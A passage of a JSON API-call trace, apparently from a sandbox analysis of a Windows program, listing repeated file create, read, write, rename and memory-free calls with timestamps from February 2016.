"timestamp": "2016-02-16 17:41:50,635", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,635", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,635", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,635", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,635", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,635", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,645", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,645", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,645", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,645", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,645", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,645", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,645", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,645", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,645", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,645", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,645", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,645", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,645", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,645", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,645", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,655", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,655", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,655", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,655", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,655", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,655", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,655", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,655", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,655", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,655", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,665", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,665", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,665", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,665", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,665", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,665", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,665", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,665", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,665", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,665", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,665", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,665", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,665", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,665", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,675", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,675", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,675", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,675", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,675", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,675", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,675", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,685", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,685", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,685", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,685", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,685", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,685", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,685", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,685", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,685", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,685", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,695", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,695", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,695", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,695", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,695", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,695", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,695", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,695", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,695", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,695", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,695", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,705", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,705", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,705", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,705", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,705", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,705", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,705", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,705", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,705", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,705", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,705", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,705", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,705", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,715", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,715", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,715", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,715", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,715", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,715", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,715", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,715", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,715", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,715", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,715", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,725", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,725", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,725", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,725", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,725", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,725", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,725", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,725", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,725", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,725", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,725", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,735", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,735", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,735", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,735", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,735", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,745", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,745", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,745", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,745", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,745", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,745", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,745", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,745", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,755", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,755", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,755", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,755", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,755", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,755", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,755", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,755", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,755", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,755", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,755", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,755", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,755", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,755", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,765", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,765", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,765", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,765", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,765", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,765", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,765", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,765", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,765", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,765", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,775", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,775", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,775", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,775", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,775", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,775", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,775", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,775", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,775", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,775", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,775", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,775", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,775", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,785", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,785", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,785", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,785", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,785", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,785", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,785", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,785", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,785", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,785", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,785", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,785", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,785", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,785", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,795", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,795", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,795", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,795", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,795", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,795", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,795", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,795", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,795", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,795", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,795", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,795", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,795", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,805", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,805", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,805", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,805", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,805", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,805", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,805", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,805", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,805", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,805", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,805", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,805", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,805", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,805", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,805", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,805", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,815", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,815", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,815", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,815", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,815", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,815", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,815", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,815", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,815", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,815", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,815", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,815", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,815", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,825", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,825", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,825", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,825", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,825", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,825", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,825", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,825", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,825", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,825", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,825", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,835", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,835", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,835", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,835", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,835", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,835", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,835", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,835", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,835", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,835", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,835", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,835", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,835", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,835", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,845", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,845", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,845", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,845", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,845", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,845", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,845", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,845", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,845", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,845", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,845", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,855", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,855", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,855", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,855", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,855", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,855", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,855", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,855", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,855", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,855", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,855", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,855", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,855", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,855", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,855", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,855", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,865", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,865", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,865", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,865", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,865", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,865", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,865", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,865", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,865", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,865", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,865", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,865", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,865", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,865", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,875", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,875", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,875", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,875", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,875", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,875", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,875", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,875", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,875", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,875", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,875", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,875", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,875", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,885", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,885", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,885", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,885", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,885", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,885", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,885", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,885", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,885", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,885", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,885", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,885", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,885", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,895", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,895", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,895", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,895", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,895", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,895", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,895", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,895", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,895", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,895", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,895", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,905", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 